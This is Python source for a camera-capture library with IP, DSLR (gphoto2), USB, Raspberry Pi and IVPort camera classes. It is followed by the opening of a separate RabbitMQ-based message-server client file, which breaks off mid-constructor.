self._focus_range = config.get("focus_range", [1, 99999])
# set commands from the rest of the config.
self.command_urls = config.get('urls', {})
self.return_keys = config.get("keys", {})
self.image_quality = self.image_quality
super(IPCamera, self).__init__(identifier, **kwargs)
self.logger.info(self.status)
def _make_request(self, command_string, *args, **kwargs):
"""
Makes a generic request formatting the command string and applying the authentication.
:param command_string: command string like read stream raw
:type command_string: str
:param args:
:param kwargs:
:return:
"""
url = self._url.format(*args, command=command_string, **kwargs)
if "&" in url and "?" not in url:
url = url.replace("&", "?", 1)
response = None
try:
response = requests.get(url, timeout=60, auth=self.auth_object)
if response.status_code == 401:
self.logger.debug("Auth is not basic, trying digest")
response = requests.get(url, timeout=60, auth=self.auth_object_digest)
if response.status_code not in [200, 204]:
self.logger.error(
"[{}] - {}\n{}".format(str(response.status_code), str(response.reason), str(response.url)))
return
return response
except Exception as e:
self.logger.error("Some exception got raised {}".format(str(e)))
return
def _read_stream(self, command_string, *args, **kwargs):
"""
opens a url with the current HTTP_login string
:type command_string: str
:param command_string: url to go to with parameters
:return: string of data returned from the camera
"""
response = self._make_request(command_string, *args, **kwargs)
if response is None:
return
return response.text
def _read_stream_raw(self, command_string, *args, **kwargs):
"""
opens a url with the current HTTP_login string
:param command_string: url to go to with parameters
:type command_string: str
:return: string of data returned from the camera
"""
response = self._make_request(command_string, *args, **kwargs)
if response is None:
return
return response.content
def _get_cmd(self, cmd):
cmd_str = self.command_urls.get(cmd, None)
if not cmd_str and cmd_str not in self._notified:
print("No command available for \"{}\"".format(cmd))
self._notified.append(cmd_str)
return None, None
keys = self.return_keys.get(cmd, [])
if type(keys) not in (list, tuple):
keys = [keys]
return cmd_str, keys
@staticmethod
def get_value_from_xml(message_xml, *args):
"""
gets float, int or string values from a xml string where the key is the tag of the first element with value as
text.
:param message_xml: the xml to searach in.
:param args: list of keys to find values for.
:rtype: dict
:return: dict of arg: value pairs requested
"""
return_values = dict()
if not len(args):
return return_values
if not len(message_xml):
return return_values
# apparently, there is an issue parsing when the ptz returns INVALID XML (WTF?)
# these seem to be the tags that get mutilated.
illegal = ['\n', '\t', '\r',
"<CPStatusMsg>", "</CPStatusMsg>", "<Text>",
"</Text>", "<Type>Info</Type>", "<Type>Info",
"Info</Type>", "</Type>", "<Type>"]
for ill in illegal:
message_xml = message_xml.replace(ill, "")
root_element = ElementTree.Element("invalidation_tag")
try:
root_element = ElementTree.fromstring(message_xml)
except Exception as e:
print(str(e))
print("Couldnt parse XML!!!")
print(message_xml)
return_values = dict
for key in args:
target_ele = root_element.find(key)
if target_ele is None:
continue
value = target_ele.text.replace(' ', '')
if value is None:
continue
types = [float, int, str]
for t in types:
try:
return_values[key] = t(value)
break
except ValueError:
pass
else:
print("Couldnt cast an xml element text attribute to str. What are you feeding the xml parser?")
return return_values
@staticmethod
def get_value_from_plaintext(message, *args):
"""
gets float, int or string values from a xml string where the key is the tag of the first element with value as
text.
:param message:
:param args: list of keys to find values for.
:rtype: dict
:return: dict of arg: value pairs requested
"""
return_values = dict()
if not len(args):
return return_values
if not len(message):
return return_values
for line in message.split("\n"):
line = line.replace("= ", "=").replace(" =", "=").strip()
name, value = line.partition("=")[::2]
name, value = name.strip(), value.strip()
types = [float, int, str]
if name in args:
for t in types:
try:
v = t(value)
if str(v).lower() in ['yes', 'no', 'true', 'false', 'on', 'off']:
v = str(v).lower() in ['yes', 'true', 'on']
return_values[name] = v
break
except ValueError:
pass
else:
print("Couldnt cast an plaintext element text attribute to str. What are you feeding the parser?")
return return_values
def get_value_from_stream(self, stream, *keys):
"""
Gets a value from some text data (xml or plaintext = separated values)
returns a dict of "key":value pairs.
:param stream: text data to search for values
:type stream: str
:param keys:
:type keys: list
:return: dict of values
:rtype: dict
"""
if self.return_parser == 'plaintext':
return self.get_value_from_plaintext(stream, *keys)
elif self.return_parser == 'xml':
return self.get_value_from_xml(stream, *keys)
else:
return dict()
def capture_image(self, filename=None) -> numpy.array:
"""
Captures an image with the IP camera, uses requests.get to acqire the image.
:param filename: filename without extension to capture to.
:return: list of filenames (of captured images) if filename was specified, otherwise a numpy array of the image.
:rtype: numpy.array or list
"""
st = time.time()
cmd, keys = self._get_cmd("get_image")
if "{width}" in cmd and "{height}" in cmd:
cmd = cmd.format(width=self._image_size[0], height=self.image_size[1])
if not cmd:
self.logger.error("No capture command, this is wrong...")
return self._image
url = self._url.format(command=cmd)
for x in range(10):
try:
# fast method
a = self._read_stream_raw(cmd)
b = numpy.fromstring(a, numpy.uint8)
self._image = cv2.imdecode(b, cv2.IMREAD_COLOR)
if filename:
rfiles = self.encode_write_np_array(self._image, filename)
self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
return rfiles
else:
self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
break
except Exception as e:
self.logger.error("Capture from network camera failed {}".format(str(e)))
time.sleep(0.2)
else:
self.logger.error("All capture attempts (10) for network camera failed.")
return self._image
# def set_fov_from_zoom(self):
# self._hfov = numpy.interp(self._zoom_position, self.zoom_list, self.hfov_list)
# self._vfov = numpy.interp(self._zoom_position, self.zoom_list, self.vfov_list)
@property
def image_quality(self) -> float:
"""
Image quality as a percentage.
:getter: cached.
:setter: to camera.
:rtype: float
"""
return self._image_quality
@image_quality.setter
def image_quality(self, value: float):
assert (1 <= value <= 100)
cmd, keys = self._get_cmd("get_image_quality")
if cmd:
self._read_stream(cmd.format(value))
@property
def image_size(self) -> list:
"""
Image resolution in pixels, tuple of (width, height)
:getter: from camera.
:setter: to camera.
:rtype: tuple
"""
cmd, keys = self._get_cmd("get_image_size")
if cmd:
stream = self._read_stream(cmd)
output = self.get_value_from_stream(stream, keys)
width,height = self._image_size
for k,v in output.items():
if "width" in k:
width = v
if "height" in k:
height = v
self._image_size = [width, height]
return self._image_size
@image_size.setter
def image_size(self, value):
assert type(value) in (list, tuple), "image size is not a list or tuple!"
assert len(value) == 2, "image size doesnt have 2 elements width,height are required"
value = list(value)
assert value in self._image_size_list, "image size not in available image sizes"
cmd, keys = self._get_cmd("set_image_size")
if cmd:
self._read_stream(cmd.format(width=value[0], height=value[1]))
self._image_size = value
@property
def focus_mode(self) -> str:
"""
TODO: this is broken, returns the dict of key: value not value
Focus Mode
When setting, the mode provided must be in 'focus_modes'
:getter: from camera.
:setter: to camera.
:rtype: list
"""
cmd, keys = self._get_cmd("get_focus_mode")
if not cmd:
return None
stream_output = self._read_stream(cmd)
return self.get_value_from_stream(stream_output, keys)['mode']
@focus_mode.setter
def focus_mode(self, mode: str):
assert (self._autofocus_modes is not None)
if str(mode).upper() not in [x.upper() for x in self._autofocus_modes]:
print("Focus mode not in list of supported focus modes, not setting.")
return
cmd, keys = self._get_cmd("set_focus_mode")
if cmd:
self._read_stream(cmd.format(mode=mode))
@property
def focus_position(self):
"""
Focal position as an absolute value.
:getter: from camera.
:setter: to camera.
:rtype: float
"""
cmd, keys = self._get_cmd("get_focus")
if not cmd:
return None
stream_output = self._read_stream(cmd)
result = self.get_value_from_stream(stream_output, keys)
return next(iter(result), float(99999))
@focus_position.setter
def focus_position(self, absolute_position):
self.logger.debug("Setting focus position to {}".format(absolute_position))
cmd, key = self._get_cmd("set_focus")
if not cmd:
assert (self._focus_range is not None and absolute_position is not None)
absolute_position = min(self._focus_range[1], max(self._focus_range[0], absolute_position))
assert (self._focus_range[0] <= absolute_position <= self._focus_range[1])
self._read_stream(cmd.format(focus=absolute_position))
def focus(self):
"""
focuses the camera by cycling it through its autofocus modes.
"""
self.logger.debug("Focusing...")
tempfocus = self.focus_mode
cmd, key = self._get_cmd("set_autofocus_mode")
if not cmd or len(self._autofocus_modes) < 1:
return
for mode in self._autofocus_modes:
self.focus_mode = mode
time.sleep(2)
self.focus_mode = tempfocus
self._read_stream(cmd.format(mode=self._autofocus_modes[0]))
time.sleep(2)
self.logger.debug("Focus complete.")
@property
def focus_range(self):
"""
Information about the focus of the camera
:return: focus type, focus max, focus min
:rtype: list [str, float, float]
"""
cmd, keys = self._get_cmd("get_focus_range")
if not cmd:
return None
stream_output = self._read_stream(cmd)
values = self.get_value_from_stream(stream_output, keys)
return values[2:0:-1]
@property
def hfov_list(self):
"""
List of horizontal FoV values according to focus list.
:getter: cached.
:setter: cache.
:rrtype: list(float)
"""
return self._hfov_list
@hfov_list.setter
def hfov_list(self, value):
assert type(value) in (list, tuple), "must be either list or tuple"
# assert len(value) == len(self._zoom_list), "must be the same length as zoom list"
self._hfov_list = list(value)
@property
def vfov_list(self):
"""
List of vertical FoV values according to focus list.
:getter: cached.
:setter: cache.
:rrtype: list(float)
"""
return self._vfov_list
@vfov_list.setter
def vfov_list(self, value):
assert type(value) in (list, tuple), "must be either list or tuple"
# assert len(value) == len(self._zoom_list), "must be the same length as zoom list"
self._vfov_list = list(value)
@property
def hfov(self):
"""
Horizontal FoV
:getter: calculated using cached zoom_position, zoom_list and hfov_list.
:setter: cache.
:rrtype: list(float)
"""
# self._hfov = numpy.interp(self._zoom_position, self.zoom_list, self.hfov_list)
return self._hfov
@hfov.setter
def hfov(self, value: float):
self._hfov = value
@property
def vfov(self):
"""
Vertical FoV
:getter: calculated using cached zoom_position, zoom_list and vfov_list.
:setter: cache.
:rrtype: list(float)
"""
# self._vfov = numpy.interp(self._zoom_position, self.zoom_list, self.vfov_list)
return self._vfov
@vfov.setter
def vfov(self, value: float):
self._vfov = value
@property
def status(self) -> str:
"""
Helper property for a string of the current zoom/focus status.
:return: informative string of zoom_pos zoom_range focus_pos focus_range
:rtype: str
"""
# fmt_string = "zoom_pos:\t{}\nzoom_range:\t{}"
fmt_string = "".join(("\nfocus_pos:\t{}\nfocus_range:\t{}"))
return fmt_string.format(self.focus_position, self.focus_range)
class GPCamera(Camera):
"""
Camera class
other cameras inherit from this class.
identifier and usb_address are NOT OPTIONAL
"""
def __init__(self, identifier: str = None, lock=Lock(), **kwargs):
self.lock = lock
self._serialnumber = None
self.usb_address = [None, None]
super(GPCamera, self).__init__(identifier, **kwargs)
self.exposure_length = self.config.get('camera', "exposure")
def re_init(self):
"""
re initialises the camera.
"""
super(GPCamera, self).re_init()
with self.lock:
serialnumber = None
camera = None
if self.identifier is not None:
for cam in gp.list_cameras():
serialnumber = cam.status.serialnumber
if serialnumber in self.identifier:
camera = cam
break
else:
raise IOError("Camera not available or connected")
else:
for cam in gp.list_cameras():
try:
serialnumber = str(cam.status.serialnumber)
self.identifier = SysUtil.default_identifier(prefix=serialnumber)
camera = cam
break
except:
pass
else:
raise IOError("No cameras available")
self.usb_address = camera._usb_address
self._serialnumber = serialnumber
self.logger.info("Camera detected at usb port {}:{}".format(*self.usb_address))
self.exposure_length = self.config.getint("camera", "exposure")
def get_exif_fields(self):
"""
This is meant to get the exif fields for the image if we want to manually save them.
This is incomplete.
:return: dictionary of exif fields.
:rtype: dict
"""
exif = super(GPCamera, self).get_exif_fields()
try:
camera = self._get_camera()
exif['Exif.Image.Make'] = getattr(camera.status, 'manufacturer', 'Make')
exif['Exif.Image.Model'] = getattr(camera.status, 'cameramodel', 'Model')
exif['Exif.Image.BodySerialNumber'] = self.eos_serial_number
exif['Exif.Image.CameraSerialNumber'] = self.serial_number
try:
exif['Exif.Photo.ISOSpeed'] = self['iso'].value
except:
pass
try:
exif['Exif.Photo.Aperture'] = self['aperture'].value
except:
pass
except Exception as e:
self.logger.error("Couldnt get full exif data. {}".format(str(e)))
return exif
def _get_camera(self):
with self.lock:
try:
camera = gp.Camera(bus=self.usb_address[0], device=self.usb_address[1])
if self._serialnumber == camera.status.serialnumber:
self.logger.debug("Camera matched for {}:{}".format(*self.usb_address))
return camera
except Exception as e:
self.logger.info("Camera wasnt at the correct usb address or something: {}".format(str(e)))
for camera in gp.list_cameras():
try:
if camera.status.serialnumber == self._serialnumber:
return camera
except Exception as e:
self.logger.info("Couldnt acquire lock for camera. {}".format(str(e)))
else:
raise FileNotFoundError("Camera cannot be found")
def capture_image(self, filename=None):
"""
Gapture method for DSLRs.
Some contention exists around this method, as its definitely not the easiest thing to have operate robustly.
:func:`GPCamera._cffi_capture` is how it _should_ be done, however that method is unreliable and causes many
crashes when in real world timelapse situations.
This method calls gphoto2 directly, which makes us dependent on gphoto2 (not just libgphoto2 and gphoto2-cffi),
and there is probably some issue with calling gphoto2 at the same time like 5 times, maybe dont push it.
:param filename: filename without extension to capture to.
:return: list of filenames (of captured images) if filename was specified, otherwise a numpy array of the image.
:rtype: numpy.array or list
"""
import subprocess
import glob
# the %C filename parameter given to gphoto2 will automatically expand the number of image types that the
# camera is set to capture to.
# this one shouldnt really be used.
fn = "{}-temp.%C".format(self.camera_name)
cmd = [
"gphoto2",
"--port=usb:{bus:03d},{dev:03d}".format(bus=self.usb_address[0], dev=self.usb_address[1]),
"--set-config=capturetarget=0", # capture to sdram
"--force-overwrite", # if the target image exists. If this isnt present gphoto2 will lock up asking
"--capture-image-and-download", # must capture & download in the same call to use sdram target.
'--filename={}'.format(fn)
]
self.logger.debug("Capture start: {}".format(fn))
for tries in range(6):
self.logger.debug("CMD: {}".format(" ".join(cmd)))
try:
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, universal_newlines=True)
if "error" in output.lower():
raise subprocess.CalledProcessError("non-zero exit status", cmd=cmd, output=output)
else:
# log success of capture
self.logger.info("GPCamera capture success: {}".format(fn))
for line in output.splitlines():
self.logger.debug("GPHOTO2: {}".format(line))
# glob up captured images
filenames = glob.glob(fn.replace("%C", "*"))
# if there are no captured images, log the error
if not len(filenames):
self.logger.error("capture resulted in no files.")
else:
# try and load an image for the last_image.jpg resized doodadery
try:
first = filenames[0] if filenames else None
self._image = cv2.cvtColor(cv2.imread(first, cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB)
except Exception as e:
self.logger.error("Failed to set current image: {}".format(str(e)))
if filename:
# return the filenames of the spooled images if files were requestsed.
return filenames
else:
# otherwise remove the temporary files that we created in order to fill self._image
for fp in filenames:
os.remove(fp)
# and return self._image
return self._image
except subprocess.CalledProcessError as e:
self.logger.error("failed {} times".format(tries))
for line in e.output.splitlines():
if not line.strip() == "" and "***" not in line:
self.logger.error(line.strip())
else:
self.logger.critical("Really bad stuff happened. too many tries capturing.")
if filename:
return []
return None
def _cffi_capture(self, filename=None):
"""
old cffi capture. very unreliable.
Causes a memory leak somewhere that I cant find.
:param filename: filename without extension to capture to.
:return: list of filenames (of captured images) if filename was specified, otherwise a numpy array of the image.
:rtype: numpy.array or list
"""
st = time.time()
camera = None
for x in range(10):
try:
camera = self._get_camera()
successes = list()
size = 0
for idx, image in enumerate(list(camera.capture(img_expect_count=2, timeout=20))):
with image:
try:
size += image.size
fn = (filename or os.path.splitext(image.filename)[0]) + os.path.splitext(image.filename)[
-1]
if idx == 0:
self._image = cv2.imdecode(numpy.fromstring(image.read(), numpy.uint8), cv2.IMREAD_COLOR)
image.save(fn)
successes.append(fn)
try:
image.remove()
except Exception as e:
self.logger.info("Couldnt remove image for some reason (probably already gone)")
del image
self.logger.debug("Captured and stored: {}".format(fn))
except:
# cant do anything if failure here.
pass
self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
self.logger.debug("Filesize {}".format(size))
if filename:
return successes
return self._image
except Exception as e:
self.logger.error("Error Capturing with DSLR: {}".format(str(e)))
time.sleep(1)
finally:
if camera:
camera.release()
else:
self.logger.fatal("(10) Tries capturing failed")
if filename:
return []
return None
def __getitem__(self, item):
return next(iter(self._config(item)), None)
@property
def serial_number(self) -> str:
"""
returns the current serialnumber for the camera.
"""
return self._serialnumber
def focus(self):
"""
this is meant to trigger the autofocus. currently not in use because it causes some distortion in the images.
"""
camera = self._get_camera()
try:
pass
# camera._get_config()['actions']['eosremoterelease'].set("Release Full")
# camera._get_config()['actions']['eosremoterelease'].set("Press 1")
# camera._get_config()['actions']['eosremoterelease'].set("Release Full")
except Exception as e:
print(str(e))
@property
def eos_serial_number(self) -> str or None:
"""
returns the eosserialnumber of supported cameras, otherwise the normal serialnumber
"""
camera = self._get_camera()
sn = vars(camera.status).get("eosserialnumber", self.serial_number)
camera.release()
return sn
def _config(self, field: str) -> list:
"""
searches for a field from the camera config.
:param field: string to search
:return: list of matching fields, should mostly be len 1
"""
fields_found = []
camera = self._get_camera()
config = camera._get_config()
camera.release()
return list(nested_lookup(field, config))
class USBCamera(Camera):
"""
USB Camera Class
"""
@classmethod
def stream_thread(cls):
"""
usb camera stream thread.
TODO: Needs to be aware of multiple cameras.
"""
print("ThreadStartup ...")
cam = cv2.VideoCapture()
# camera setup
# let camera warm up
time.sleep(2)
cam.set(3, 30000)
cam.set(4, 30000)
print("Started up!")
# for foo in camera.capture_continuous(stream, 'jpeg',
# use_video_port=True):
while True:
ret, frame = cam.read()
frame = cv2.imencode(".jpg", frame)
cls._frame = frame[1].tostring()
# store frame
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls._last_access > 10:
print("ThreadShutdown")
break
cls._thread = None
def __init__(self, identifier, sys_number, **kwargs):
"""
USB camera init. must have a sys_number (the 0 from /dev/video0) to capture from
:param identifier: identifier for the webcamera
:param sys_number: system device number of device to use
:param kwargs:
"""
# only webcams have a v4l sys_number.
self.sys_number = int(sys_number)
self.video_capture = None
try:
self.video_capture = cv2.VideoCapture()
except Exception as e:
self.logger.fatal("couldnt open video capture device on {}".format(self.sys_number))
super(USBCamera, self).__init__(identifier, **kwargs)
def re_init(self):
"""
re-initialisation of webcamera
todo: fix release of camera otherwise it gets locked forever.
"""
super(USBCamera, self).re_init()
self._assert_capture_device()
try:
if not self.video_capture.open(self.sys_number):
self.logger.fatal("Couldnt open a video capture device on {}".format(self.sys_number))
except Exception as e:
self.logger.fatal("Couldnt open a video capture device")
# 3 -> width 4->height 5->fps just max them out to get the highest resolution.
self.video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 100000)
self.video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, 100000)
self.logger.info("Capturing at {w}x{h}".format(w=self.video_capture.get(cv2.CAP_PROP_FRAME_WIDTH),
h=self.video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))
def stop(self):
"""
releases the video device and stops the camera thread
"""
try:
self.video_capture.release()
except Exception as e:
self.logger.error("Couldnt release cv2 device {}".format(str(e)))
self.stopper.set()
def _assert_capture_device(self):
"""
ensures the capture device is open and valid.
:param self:
"""
try:
if not self.video_capture:
self.video_capture = cv2.VideoCapture()
if not self.video_capture.isOpened():
if not self.video_capture.open(self.sys_number):
raise IOError("VideoCapture().open({}) failed.".format(self.sys_number))
except Exception as e:
self.logger.error("Capture device could not be opened {}".format(str(e)))
def capture_image(self, filename=None):
"""
captures an image from the usb webcam.
Writes some limited exif data to the image if it can.
:param filename: filename to output without excension
:return: list of image filenames if filename was specified, otherwise a numpy array.
:rtype: numpy.array or list
"""
st = time.time()
for _ in range(50):
try:
ret, im = self.video_capture.read()
if ret:
self._image = im
break
time.sleep(0.1)
except Exception as e:
self.logger.error("Error webcam capture did not read {}".format(str(e)))
else:
return None
if filename:
try:
filenames = self.encode_write_np_array(self._image, filename)
self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
return filenames
except Exception as e:
self.logger.error("Could not write image {}".format(str(e)))
else:
self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
return self._image
return None
class PiCamera(Camera):
"""
Picamera extension to the Camera abstract class.
"""
@classmethod
def stream_thread(cls):
"""
Streaming thread member.
uses :func:`picamera.PiCamera.capture_continuous` to stream data from the rpi camera video port.
:func:`time.sleep` added to rate limit a little bit.
"""
import picamera
print("start thread")
try:
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (640, 480)
# camera.hflip = True
# camera.vflip = True
# let camera warm up
camera.start_preview()
time.sleep(2)
stream = BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls._frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
time.sleep(0.01)
if time.time() - cls._last_access > 1:
break
except Exception as e:
print("Couldnt acquire camera")
print("Closing Thread")
cls._thread = None
def set_camera_settings(self, camera):
"""
Sets the camera resolution to the max resolution
if the config provides camera/height or camera/width attempts to set the resolution to that.
if the config provides camera/isoattempts to set the iso to that.
if the config provides camera/shutter_speed to set the shutterspeed to that.
:param picamera.PiCamera camera: picamera camera instance to modify
"""
try:
camera.resolution = camera.MAX_RESOLUTION
if self.config.has_option("camera", "width") and self.config.has_option("camera", "height"):
camera.resolution = (self.config.getint("camera", "width"),
self.config.getint("camera", "height"))
if self.config.has_option("camera", "shutter_speed"):
camera.shutter_speed = self.config.getfloat("camera", "shutter_speed")
if self.config.has_option("camera", "iso"):
camera.iso = self.config.getint("camera", "iso")
except Exception as e:
self.logger.error("error setting picamera settings: {}".format(str(e)))
def capture_image(self, filename: str = None) -> numpy.array:
"""
Captures image using the Raspberry Pi Camera Module, at either max resolution, or resolution
specified in the config file.
Writes images disk using :func:`encode_write_np_array`, so it should write out to all supported image formats
automatically.
:param filename: image filename without extension
:return: :func:`numpy.array` if filename not specified, otherwise list of files.
:rtype: numpy.array
"""
st = time.time()
try:
with picamera.PiCamera() as camera:
with picamera.array.PiRGBArray(camera) as output:
time.sleep(2) # Camera warm-up time
self.set_camera_settings(camera)
time.sleep(0.2)
self._image = numpy.empty((camera.resolution[1], camera.resolution[0], 3), dtype=numpy.uint8)
camera.capture(output, 'rgb')
self._image = output.array
self._image = cv2.cvtColor(self._image, cv2.COLOR_BGR2RGB)
if filename:
filenames = self.encode_write_np_array(self._image, filename)
self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
return filenames
else:
self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
except Exception as e:
self.logger.critical("EPIC FAIL, trying other method. {}".format(str(e)))
return self._image
class IVPortCamera(PiCamera):
"""
IVPort class for multiple capture.
the 4 tags on the IVport are setout below.
"""
current_camera_index = 0
# these are for the video streaming
select = 7
enable_pins = {
"A": [11, 12],
"B": [15, 16],
"C": [21, 22],
"D": [23, 24]
}
TRUTH_TABLE = [
[False, False, True],
[True, False, True],
[False, True, False],
[True, True, False]
]
gpio_groups = ("B",)
def __init__(self,
identifier: str = None,
queue: deque = None,
gpio_group: tuple=("B",),
camera_number: int = None, **kwargs):
"""
special __init__ for the IVport to set the gpio enumeration
This controls which gpio are on or off to select the camera and whcih camera group has been soldered on the
ivport. Multiple camera groups can be specified, and they will be enumerated in alphabetical order.
:param identifier: string identifier for the camera
:type identifier: str
:param queue: communication queue for the camera to communicate with the updater
:type queue: deque
:param kwargs:
"""
self.__class__.gpio_groups = sorted(gpio_group)
if camera_number is None:
super(IVPortCamera, self).__init__(identifier=identifier, queue=queue, **kwargs)
else:
self.__class__.current_camera_index = camera_number
IVPortCamera.switch(idx=self.__class__.current_camera_index)
def setup(self):
"""
sets up gpio for IVPort
"""
super(IVPortCamera, self).setup()
# switch to the current camera index.
IVPortCamera.switch(idx=self.__class__.current_camera_index)
@classmethod
def switch(cls, idx: int = None):
"""
switches the IVPort to a new camera
with no index, switches to the next camera, looping around from the beginning
:param idx: index to switch the camera to (optional)
:type idx: int
"""
time.sleep(1)
# import RPi.GPIO as GPIO
cls.current_camera_index += 1
if idx is not None:
cls.current_camera_index = idx
cls.current_camera_index %= (len(IVPortCamera.TRUTH_TABLE)*len(cls.gpio_groups))
# GPIO.setwarnings(False)
# GPIO.setmode(GPIO.BOARD)
# GPIO.setup(IVPortCamera.select, GPIO.OUT)
# current groups determined by the camera index / number of cameras per board (truth table len)
current_group = cls.gpio_groups[int(cls.current_camera_index/len(IVPortCamera.TRUTH_TABLE))]
current_pins = cls.enable_pins[current_group]
print("Switching to camera {}: {}".format(current_group, cls.current_camera_index))
# GPIO.setup(current_pins[0], GPIO.OUT)
# GPIO.setup(current_pins[1], GPIO.OUT)
# per camera index, current camera index mod the number of cameras per board
truth_table_idx = cls.current_camera_index % len(IVPortCamera.TRUTH_TABLE)
pin_values = [
IVPortCamera.TRUTH_TABLE[truth_table_idx][0],
IVPortCamera.TRUTH_TABLE[truth_table_idx][1],
IVPortCamera.TRUTH_TABLE[truth_table_idx][2]
]
# GPIO.output(IVPortCamera.select, pin_values[0])
# GPIO.output(IVPortCamera.enable_pins[0], pin_values[1])
# GPIO.output(IVPortCamera.enable_pins[1], pin_values[2])
print(pin_values)
def capture_image(self, filename: str = None) -> list:
"""
capture method for IVPort
iterates over the number of vameras
:return: :func:`numpy.array` if filename not specified, otherwise list of files.
:rtype: numpy.array or list
"""
filenames = []
st = time.time()
import picamera
import numpy as np
try:
with picamera.PiCamera() as camera:
with picamera.array.PiRGBArray(camera) as _image:
camera.start_preview()
time.sleep(2) # Camera warm-up time
self.set_camera_settings(camera)
w, h = camera.resolution
self._image = numpy.empty((h, w * len(IVPortCamera.TRUTH_TABLE), 3), dtype=numpy.uint8)
for c in range(0, len(IVPortCamera.TRUTH_TABLE)):
try:
ast = time.time()
IVPortCamera.switch(idx=c)
camera.capture(_image, 'rgb')
# _image = numpy.empty((camera.resolution[1], camera.resolution[0], 3), dtype=numpy.uint8)
if filename:
image_numbered = "{}-{}{}".format(os.path.splitext(filename)[0], str(c),
os.path.splitext(filename)[-1])
filenames.append(self.encode_write_np_array(_image.array, image_numbered))
self.logger.debug(
"Took {0:.2f}s to capture image #{1}".format(time.time() - ast, str(c)))
# setup the images
offset = c * w
self._image[0:h, offset: offset + w] = _image.array
self._image = cv2.cvtColor(self._image, cv2.COLOR_BGR2RGB)
except Exception as e:
self.logger.critical("Couldnt capture (IVPORT) with camera {} {}".format(str(c), str(e)))
_image.truncate(0)
time.sleep(0.1)
self.logger.debug("Took {0:.2f}s to capture all images".format(time.time() - ast))
if filename:
return filenames
else:
return self._image
except Exception as e:
self.logger.error("Couldnt acquire picam: {}".format(str(e)))
"""
Threaded implementations
"""
class ThreadedCamera(Thread):
def __init__(self, *args, **kwargs):
if hasattr(self, "identifier"):
Thread.__init__(self, name=self.identifier)
else:
Thread.__init__(self)
print("Threaded startup")
# super(self.__class__, self).__init__(*args, **kwargs)
self.daemon = True
if hasattr(self, "config_filename") and hasattr(self, "re_init"):
SysUtil().add_watch(self.config_filename, self.re_init)
class ThreadedGPCamera(ThreadedCamera, GPCamera):
def __init__(self, *args, **kwargs):
GPCamera.__init__(self, *args, **kwargs)
super(ThreadedGPCamera, self).__init__(*args, **kwargs)
def run(self):
super(GPCamera, self).run()
class ThreadedIPCamera(ThreadedCamera, IPCamera):
def __init__(self, *args, **kwargs):
IPCamera.__init__(self, *args, **kwargs)
super(ThreadedIPCamera, self).__init__(*args, **kwargs)
def run(self):
super(IPCamera, self).run()
class ThreadedUSBCamera(ThreadedCamera, USBCamera):
def __init__(self, *args, **kwargs):
USBCamera.__init__(self, *args, **kwargs)
super(ThreadedUSBCamera, self).__init__(*args, **kwargs)
def run(self):
super(USBCamera, self).run()
class ThreadedPiCamera(ThreadedCamera, PiCamera):
def __init__(self, *args, **kwargs):
PiCamera.__init__(self, *args, **kwargs)
super(ThreadedPiCamera, self).__init__(*args, **kwargs)
def run(self):
super(PiCamera, self).run()
class ThreadedIVPortCamera(ThreadedCamera, IVPortCamera):
def __init__(self, *args, **kwargs):
IVPortCamera.__init__(self, *args, **kwargs)
super(ThreadedIVPortCamera, self).__init__(*args, **kwargs)
def run(self):
super(IVPortCamera, self).run()
|
bms_client.py | #!/usr/bin/env python
"""
Copyright 2014 The Trustees of Princeton University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import pika
import json
import string
import random
import threading
BMS_REGISTRATION_EXCHANGE = 'bms_registrations'
BMS_REGISTRATION_QUEUE = 'bms_registrations'
BMS_REREGISTRATION_SEC = 5*60
"""
Interface class to iPlant Border Message Server
"""
class bms_registration_result_client(object):
def __init__(self, user_id=None,
application_name=None):
self.user_id = user_id
self.application_name = application_name
@classmethod
def fromDict(cls, dictionary):
return bms_registration_result_client(dictionary['user_id'], dictionary['application_name'])
def __repr__(self):
return "<bms_registration_result_client %s %s>" % (self.user_id, self.application_name)
class bms_registration_result(object):
def __init__(self, client=None,
lease_start=0,
lease_expire=0):
self.client = client
self.lease_start = lease_start
self.lease_expire = lease_expire
@classmethod
def fromJson(cls, json_string):
if bms_registration_result.isRegistrationJson(json_string):
msg = json.loads(json_string)
return bms_registration_result(client=bms_registration_result_client.fromDict(msg['client']),
lease_start=msg['lease_start'],
lease_expire=msg['lease_expire'])
else:
return None
@classmethod
def isRegistrationJson(cls, json_string):
if json_string and len(json_string) > 0:
msg = json.loads(json_string)
if ('client' in msg) and ('lease_start' in msg) and ('lease_expire' in msg):
return True
return False
def __repr__(self):
return "<bms_registration_result %s %d %d>" % (self.client, self.lease_start, self.lease_expire)
class bms_message_acceptor(object):
def __init__(self, acceptor="path",
pattern="*"):
self.acceptor = acceptor
self.pattern = pattern
def asDict(self):
return self.__dict__
def __repr__(self):
return "<bms_message_acceptor %s %s>" % (self.acceptor, self.pattern)
class bms_client(object):
def __init__(self, host=None,
port=31333,
vhost="/",
user=None,
password=None,
appid=None,
auto_reregistration=True,
acceptors=None
):
self.host = host
self.port = port
self.vhost = vhost
self.user = user
self.password = password
if appid:
self.appid = appid
else:
self.appid = self._generateAppid()
self.connection = None
self.channel = None
self.queue = None
self.closing = False
self.consumer_tag = None
self.consumer_thread = None
self.registration_msg = None
self.registration_timer = None
self.auto_reregistration = auto_reregistration
self.acceptors = acceptors
